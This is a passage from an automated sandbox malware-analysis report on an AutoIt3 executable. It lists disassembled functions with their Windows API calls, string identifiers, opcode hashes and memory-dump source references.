                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                      • String ID:
                                      • API String ID: 839392675-0
                                      • Opcode ID: abebb8da9f2a8df7b78ffbb63eb68164046b3eaa1a80133a9e2bb7bc801554cf
                                      • Instruction ID: b3fb0a050e5de2602c48556c3845fac5ab0a798ca21658712ab395e812fd828a
                                      • Opcode Fuzzy Hash: abebb8da9f2a8df7b78ffbb63eb68164046b3eaa1a80133a9e2bb7bc801554cf
                                      • Instruction Fuzzy Hash: F4F03032641258BFE7216B929C0DEEF7F7CFFC6B11F04015AFA05D1050D7A01A118AB5
                                      Function 008677EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • InterlockedExchange.KERNEL32(?,?), ref: 008677FE
                                      • EnterCriticalSection.KERNEL32(?,?,0080C2B6,?,?), ref: 0086780F
                                      • TerminateThread.KERNEL32(00000000,000001F6,?,0080C2B6,?,?), ref: 0086781C
                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0080C2B6,?,?), ref: 00867829
                                        • Part of subcall function 008671F0: CloseHandle.KERNEL32(00000000,?,00867836,?,0080C2B6,?,?), ref: 008671FA
                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0086783C
                                      • LeaveCriticalSection.KERNEL32(?,?,0080C2B6,?,?), ref: 00867843
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                      • String ID:
                                      • API String ID: 3495660284-0
                                      • Opcode ID: 91c6685e7fe65dcd6a31d6e445288a957f40375e5e36a10d7a6321c9e5086566
                                      • Instruction ID: f65c4087e4506b0d4c5d88897d946a6f6738616006c488966b85d46ef36bf011
                                      • Opcode Fuzzy Hash: 91c6685e7fe65dcd6a31d6e445288a957f40375e5e36a10d7a6321c9e5086566
                                      • Instruction Fuzzy Hash: F2F05E32545212AFD7123BA4EC8CAAB7769FF45302B190423F102951A5CBB65801CFA0
                                      Function 0085954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00859555
                                      • UnloadUserProfile.USERENV(?,?), ref: 00859561
                                      • CloseHandle.KERNEL32(?), ref: 0085956A
                                      • CloseHandle.KERNEL32(?), ref: 00859572
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0085957B
                                      • HeapFree.KERNEL32(00000000), ref: 00859582
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                      • String ID:
                                      • API String ID: 146765662-0
                                      • Opcode ID: 410aff338f53af1ce1ad3e6dda07cc16cf0212567616e61a75b24c4ef04d4e01
                                      • Instruction ID: 273c3293c202bbdf93e7e25ce26279589c62e3a8d25fc159a93d3be8594ef1ac
                                      • Opcode Fuzzy Hash: 410aff338f53af1ce1ad3e6dda07cc16cf0212567616e61a75b24c4ef04d4e01
                                      • Instruction Fuzzy Hash: AFE07577104505BFDB412FE5EC0C95ABF79FF49722B584622F21991570CB32A461EF50
                                      Function 00878CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 00878CFD
                                      • CharUpperBuffW.USER32(?,?), ref: 00878E0C
                                      • VariantClear.OLEAUT32(?), ref: 00878F84
                                        • Part of subcall function 00867B1D: VariantInit.OLEAUT32(00000000), ref: 00867B5D
                                        • Part of subcall function 00867B1D: VariantCopy.OLEAUT32(00000000,?), ref: 00867B66
                                        • Part of subcall function 00867B1D: VariantClear.OLEAUT32(00000000), ref: 00867B72
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                      • API String ID: 4237274167-1221869570
                                      • Opcode ID: 0b0f98986557f2611d04ad50e027f4ae37be2ed29c5e8d07b250461b3baabecb
                                      • Instruction ID: dcfeffe1cdbaee5df49a5231f3402c197935c6baba4e468b9ff1585132d10778
                                      • Opcode Fuzzy Hash: 0b0f98986557f2611d04ad50e027f4ae37be2ed29c5e8d07b250461b3baabecb
                                      • Instruction Fuzzy Hash: FC9157716443019FC710DF28C88595ABBE5FF89354F04892EF999CB3A2DB30E945CB92
                                      Function 0086323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0081436A: _wcscpy.LIBCMT ref: 0081438D
                                      • _memset.LIBCMT ref: 0086332E
                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0086335D
                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00863410
                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0086343E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                      • String ID: 0
                                      • API String ID: 4152858687-4108050209
                                      • Opcode ID: d73d76807192fbe725cbec70232a975bb8d66d485680e8300076f77426b1a7e2
                                      • Instruction ID: 4a52d8aaa74ad8bae61d14b1d1a96bbd2b3b8fa3735c1a3a5d66fc31f52a5f73
                                      • Opcode Fuzzy Hash: d73d76807192fbe725cbec70232a975bb8d66d485680e8300076f77426b1a7e2
                                      • Instruction Fuzzy Hash: 8E51DE316083019BD7169F28E945A6BBBE8FF65324F050A2DF995D2291DF30CE44CB96
                                      Function 0088DF09 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00878A0E,?,00000000), ref: 0088DF71
                                      • SetErrorMode.KERNEL32(00000001,?,00000000,00000000,00000000,?,00878A0E,?,00000000,00000000), ref: 0088DFA7
                                      • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 0088DFB8
                                      • SetErrorMode.KERNEL32(00000000,?,00000000,00000000,00000000,?,00878A0E,?,00000000,00000000), ref: 0088E03A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                      • String ID: DllGetClassObject
                                      • API String ID: 753597075-1075368562
                                      • Opcode ID: 25ec98dd0599d4709bc834819152aeb6352b2cd879b74cd870e8a91cfd0f33a8
                                      • Instruction ID: b70dcf62ad88acf555df4c84531377b8e10c22c4f54fd369772c1eb86f01004c
                                      • Opcode Fuzzy Hash: 25ec98dd0599d4709bc834819152aeb6352b2cd879b74cd870e8a91cfd0f33a8
                                      • Instruction Fuzzy Hash: E841AC71600605EFDB15EFA5C884AAABBA9FF44314F1484AAED05DF206D7F1DD44CBA0
                                      Function 00862EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 00862F67
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00862F83
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00862FC9
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,008C7890,00000000), ref: 00863012
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem_memset
                                      • String ID: 0
                                      • API String ID: 1173514356-4108050209
                                      • Opcode ID: 6a21fea3f3985c228fed8644771ca12b6e353bac26e9b8cb93b2209fe6412080
                                      • Instruction ID: 005ee825a2831a5a8db5e11f3a5513050ec9e438d7eab33ce871a894e09e15eb
                                      • Opcode Fuzzy Hash: 6a21fea3f3985c228fed8644771ca12b6e353bac26e9b8cb93b2209fe6412080
                                      • Instruction Fuzzy Hash: B9417E712047419FD720DF29C884B5ABBA8FF84310F164A5EF5A5D7291DB70AA05CB63
                                      Function 0087DE8E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0087DEAE
                                        • Part of subcall function 00811462: _memmove.LIBCMT ref: 008114B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: BuffCharLower_memmove
                                      • String ID: cdecl$none$stdcall$winapi
                                      • API String ID: 3425801089-567219261
                                      • Opcode ID: 7a63ac271ae6fa457a7e3b1d6b602aed7ab6cceb338893c9035dfd444a788b93
                                      • Instruction ID: 74cc745aec7e94d95c7d47cedc8d8a0a4327a60386e7001e7a3dd140b6d2a5ce
                                      • Opcode Fuzzy Hash: 7a63ac271ae6fa457a7e3b1d6b602aed7ab6cceb338893c9035dfd444a788b93
                                      • Instruction Fuzzy Hash: 4B316070500629ABCF10EF98C8419EEB7B8FF15314B108629E96AE72D5DF31E945CB91
                                      Function 00859A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00859ACC
                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00859ADF
                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00859B0F
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$_memmove$ClassName
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 365058703-1403004172
                                      • Opcode ID: 9a3d3300ae946eb9d66b8a97bb18a91c3e2d1701d074a56a31aa352efe34438f
                                      • Instruction ID: eacded35ee04e86a86651b8fe9510fe5d3380d5453d21ece3edb4aefc641ab75
                                      • Opcode Fuzzy Hash: 9a3d3300ae946eb9d66b8a97bb18a91c3e2d1701d074a56a31aa352efe34438f
                                      • Instruction Fuzzy Hash: D2210172A00118BEDF24ABA8DC4ACFEBB6CFF55360F144119FC65D32D1DB3409499A61
                                      Function 00871EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00871F18
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00871F3E
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00871F6E
                                      • InternetCloseHandle.WININET(00000000), ref: 00871FB5
                                        • Part of subcall function 00872B4F: GetLastError.KERNEL32(?,?,00871EE3,00000000,00000000,00000001), ref: 00872B64
                                        • Part of subcall function 00872B4F: SetEvent.KERNEL32(?,?,00871EE3,00000000,00000000,00000001), ref: 00872B79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3113390036-3916222277
                                      • Opcode ID: fd2f219888b68bfc90e3434344cd6c463ecc3b22ad34b055a0d759faa4d7bb58
                                      • Instruction ID: b64a48ebb61ef436b8be018c7aad45e75266889778d940cec6c5cd50752e1b75
                                      • Opcode Fuzzy Hash: fd2f219888b68bfc90e3434344cd6c463ecc3b22ad34b055a0d759faa4d7bb58
                                      • Instruction Fuzzy Hash: 7821CFB1604208BFEB11AF68CC89EBF77ADFB49758F10811AF409E6204DF25DD049BA1
                                      Function 00886A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00802111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0080214F
                                        • Part of subcall function 00802111: GetStockObject.GDI32(00000011), ref: 00802163
                                        • Part of subcall function 00802111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0080216D
                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00886A86
                                      • LoadLibraryW.KERNEL32(?), ref: 00886A8D
                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00886AA2
                                      • DestroyWindow.USER32(?), ref: 00886AAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                      • String ID: SysAnimate32
                                      • API String ID: 4146253029-1011021900
                                      • Opcode ID: 2a1b661ea5bba8abc63ba5c918d1a94d85062d809eda99434926b78912b63825
                                      • Instruction ID: a3b23e8cd40fd4a939e206c59d94f63339dff836b643e66277794ed0f62f1894
                                      • Opcode Fuzzy Hash: 2a1b661ea5bba8abc63ba5c918d1a94d85062d809eda99434926b78912b63825
                                      • Instruction Fuzzy Hash: 7121BB71200219AFEF14AF689C81EBB37ACFF59324F148219FA50E2190E3319C609B60
                                      Function 00867357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(0000000C), ref: 00867377
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008673AA
                                      • GetStdHandle.KERNEL32(0000000C), ref: 008673BC
                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008673F6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 73dde761b121f104d6ab7cdcbf11d5143be1fa86ef5ae1a129d038b173490532
                                      • Instruction ID: e7cf39e88a76ebfa92130e6af8a4bc83e5575ec4fadbe1997a0265c131edd2b8
                                      • Opcode Fuzzy Hash: 73dde761b121f104d6ab7cdcbf11d5143be1fa86ef5ae1a129d038b173490532
                                      • Instruction Fuzzy Hash: 5621837050830A9FDB209F68DD05A9A77A4FF54728F214A2AFCA1D73D0D7709850DB90
                                      Function 00867425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00867444
                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00867476
                                      • GetStdHandle.KERNEL32(000000F6), ref: 00867487
                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008674C1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CreateHandle$FilePipe
                                      • String ID: nul
                                      • API String ID: 4209266947-2873401336
                                      • Opcode ID: 7354897328cebcc70befd54aae9e6448ccee84be63d1bebadc74bc6eb7243dbd
                                      • Instruction ID: 2bde9645cb26a363cb4f7d669655581a7277db811740d176679fe4aa7d0d113d
                                      • Opcode Fuzzy Hash: 7354897328cebcc70befd54aae9e6448ccee84be63d1bebadc74bc6eb7243dbd
                                      • Instruction Fuzzy Hash: 5121B2315082069FDB209F688C49A997BA8FF45738F210A1AF9B1D72D0DF719850CB99
                                      Function 0086B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B297
                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0086B2EB
                                      • __swprintf.LIBCMT ref: 0086B304
                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,00890980), ref: 0086B342
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu
                                      • API String ID: 3164766367-685833217
                                      • Opcode ID: 83a77879c33a4fff3b00e425564624a480b2e6ab76cdba27e8fbf3d7506ea9be
                                      • Instruction ID: 43648195ab0e7ba439f1d6fd0f1d591feb26b20acdc0bf206262fcdaac0f1a9b
                                      • Opcode Fuzzy Hash: 83a77879c33a4fff3b00e425564624a480b2e6ab76cdba27e8fbf3d7506ea9be
                                      • Instruction Fuzzy Hash: 37216070A40109AFCB10EFA9CC45DAEB7B8FF89704B144069F905D7352DB31EA45CB62
                                      Function 0085AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                        • Part of subcall function 0085AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0085AA6F
                                        • Part of subcall function 0085AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 0085AA82
                                        • Part of subcall function 0085AA52: GetCurrentThreadId.KERNEL32 ref: 0085AA89
                                        • Part of subcall function 0085AA52: AttachThreadInput.USER32(00000000), ref: 0085AA90
                                      • GetFocus.USER32 ref: 0085AC2A
                                        • Part of subcall function 0085AA9B: GetParent.USER32(?), ref: 0085AAA9
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0085AC73
                                      • EnumChildWindows.USER32(?,0085ACEB), ref: 0085AC9B
                                      • __swprintf.LIBCMT ref: 0085ACB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                      • String ID: %s%d
                                      • API String ID: 1941087503-1110647743
                                      • Opcode ID: c3303ecb4116e421d4cdefee452185a4f853d15d4f8dbb5a4c0d246e661c3c2c
                                      • Instruction ID: 4e61e0eade177b6bf135aabe882f1505903bb1dd2953624d6bea2728e373d389
                                      • Opcode Fuzzy Hash: c3303ecb4116e421d4cdefee452185a4f853d15d4f8dbb5a4c0d246e661c3c2c
                                      • Instruction Fuzzy Hash: 9311CD75600204ABCF16BFA48DC5FEA376CFF48312F048075BE08EA142DA715949DB72
                                      Function 008622E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00862318
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmpDownload File
